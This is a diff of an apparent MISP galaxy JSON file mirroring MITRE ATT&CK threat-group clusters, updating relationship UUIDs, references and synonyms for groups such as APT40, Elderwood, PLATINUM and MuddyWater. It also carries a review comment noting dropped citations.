@@ -10095,7 +11932,182 @@ "type": "uses" }, { - "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0998045d-f96e-4284-95ce-3c8219707486", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cde2d700-9ed1-46cf-9bce-07364fe8b24f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8e101fdd-9f7f-4916-bb04-6bd9e94c129c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "09b2cd76-c674-47cc-9f57-d2f2ad150a46", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "eff1a885-6f90-42a1-901f-eef6e7a1905e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -10109,7 +12121,112 @@ "type": "uses" }, { - "dest-uuid": "09b2cd76-c674-47cc-9f57-d2f2ad150a46", + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b76b2d94-60e4-4107-a903-4a3a7622fb3b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cf23bf4a-e003-4116-bbae-1ea6c558d565", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e6c2a9d-9dc1-4eb0-b27c-91e8076a9d77", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d5268dfb-ae2b-4e0e-ac07-02a460613d8a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10205,10 +12322,13 @@ "refs": [ "https://attack.mitre.org/groups/G0065", "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html" ], "synonyms": [ "Leviathan", + "TEMP.Jumper", + "APT40", "TEMP.Periscope" ] }, @@ -10227,27 +12347,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "94379dec-5c87-49db-b36e-66abc0b81344", "tags": [ 
@@ -10255,34 +12354,6 @@ ], "type": "uses" }, - { - "dest-uuid": "64764dc6-a032-495f-8250-1e4c06bdc163", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -10291,7 +12362,7 @@ "type": "uses" }, { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "dest-uuid": "64764dc6-a032-495f-8250-1e4c06bdc163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10304,27 +12375,6 @@ ], "type": "uses" }, - { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ 
@@ -10332,27 +12382,6 @@ ], "type": "uses" }, - { - "dest-uuid": "705f0783-5f7d-4491-b6b7-9628e6e006d2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "5a3a31fe-5a8f-48e1-bff0-a753e5b1be70", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", "tags": [ @@ -10361,21 +12390,7 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "dest-uuid": "705f0783-5f7d-4491-b6b7-9628e6e006d2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10395,13 +12410,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ @@ -10409,6 +12417,20 @@ ], "type": "uses" }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ 
@@ -10416,6 +12438,90 @@ ], "type": "uses" }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "5a3a31fe-5a8f-48e1-bff0-a753e5b1be70", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + 
"type": "uses" + }, { "dest-uuid": "06d735e7-1db1-4dbe-ab4b-acbe419f902b", "tags": [ @@ -10429,6 +12535,69 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0c8465c0-d0b4-4670-992e-4eee8d7ff952", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "7113eaa5-ba79-4fb3-b68a-398ee9cd698e", @@ -10448,7 +12617,7 @@ }, "related": [ { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -10461,6 +12630,13 @@ ], "type": "uses" }, + { + "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ @@ -10468,20 +12644,6 @@ ], "type": "uses" }, - { - "dest-uuid": "d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -10490,7 +12652,21 @@ "type": "uses" }, { - "dest-uuid": "cde2d700-9ed1-46cf-9bce-07364fe8b24f", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10504,7 +12680,7 @@ "type": "uses" }, { - "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", + "dest-uuid": "cde2d700-9ed1-46cf-9bce-07364fe8b24f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10518,7 +12694,7 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -10534,9 +12710,9 @@ "external_id": "G0066", "refs": [ "https://attack.mitre.org/groups/G0066", + "http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", - "https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China", - "http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html" + "https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China" ], "synonyms": [ "Elderwood", @@ -10560,27 +12736,6 @@ ], "type": "uses" }, - { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4d8a2d6-c684-453a-8a14-cf4a94f755c5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", "tags": [ @@ -10588,20 +12743,6 @@ ], "type": "uses" }, - { - "dest-uuid": "73a4793a-ce55-4159-b2a6-208ef29b326f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e811ff6a-4cef-4856-a6ae-a7daf9ed39ae", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "tags": [ 
@@ -10609,20 +12750,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "48523614-309e-43bf-a2b8-705c2b45d7b2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e9e9bfe2-76f4-4870-a2a1-b7af89808613", "tags": [ @@ -10630,13 +12757,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "79499993-a8d6-45eb-b343-bf58dea5bdde", "tags": [ @@ -10645,7 +12765,28 @@ "type": "uses" }, { - "dest-uuid": "c251e4a5-9a2e-4166-8e42-442af75c3b9a", + "dest-uuid": "48523614-309e-43bf-a2b8-705c2b45d7b2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10659,7 +12800,21 @@ "type": "uses" }, { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "dest-uuid": "73a4793a-ce55-4159-b2a6-208ef29b326f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c251e4a5-9a2e-4166-8e42-442af75c3b9a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -10678,6 +12833,27 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "f4d8a2d6-c684-453a-8a14-cf4a94f755c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e811ff6a-4cef-4856-a6ae-a7daf9ed39ae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "03506554-5f37-4f8f-9ce4-0e9f01a1b484", @@ -10696,27 +12872,6 @@ ] }, "related": [ - { - "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ @@ -10731,12 +12886,33 @@ ], "type": "uses" }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "d69e568e-9ac8-4c08-b32c-d93b43ba9172", 
@@ -10747,8 +12923,7 @@ "meta": { "external_id": "G0068", "refs": [ - "https://attack.mitre.org/groups/G0068", - "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + "https://attack.mitre.org/groups/G0068" ], "synonyms": [ "PLATINUM" @@ -10783,6 +12958,34 @@ ], "type": "uses" }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e170995d-4f61-4f17-b60e-04f9a06ee517", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -10791,14 +12994,21 @@ "type": "uses" }, { - "dest-uuid": "de6cb631-52f6-4169-a73b-7965390b0c30", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "de6cb631-52f6-4169-a73b-7965390b0c30", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
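Review bot: The PLATINUM (G0068) hunk shrinks the `refs` array to the single `https://attack.mitre.org/groups/G0068` entry, dropping the Microsoft "Targeted attacks in South and Southeast Asia" PDF that was the primary report for this group; the Skeleton Key (S0007) hunk later in this patch does the same with the SecureWorks malware analysis. Every other regenerated entry in these hunks keeps or extends its references, so these two look like the only places where the regeneration loses a citation rather than reordering one. Since the galaxy is a mirror of ATT&CK, this is presumably the upstream `external_references` changing rather than a generator bug, but it is worth confirming before merging, because analysts rely on these refs to reach the original vendor report. If the loss is upstream, consider keeping the previously published URL in the cluster so the galaxy does not silently lose sources between versions.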
@@ -10819,35 +13029,7 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10861,7 +13043,7 @@ "type": "uses" }, { - "dest-uuid": "e170995d-4f61-4f17-b60e-04f9a06ee517", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -10872,16 +13054,19 @@ "value": "PLATINUM - G0068" }, { - "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but is believed to be a distinct group motivated by espionage. (Citation: Unit 42 MuddyWater Nov 2017)", + "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but the group is believed to be a distinct group possibly motivated by espionage.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)", "meta": { "external_id": "G0069", "refs": [ "https://attack.mitre.org/groups/G0069", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", 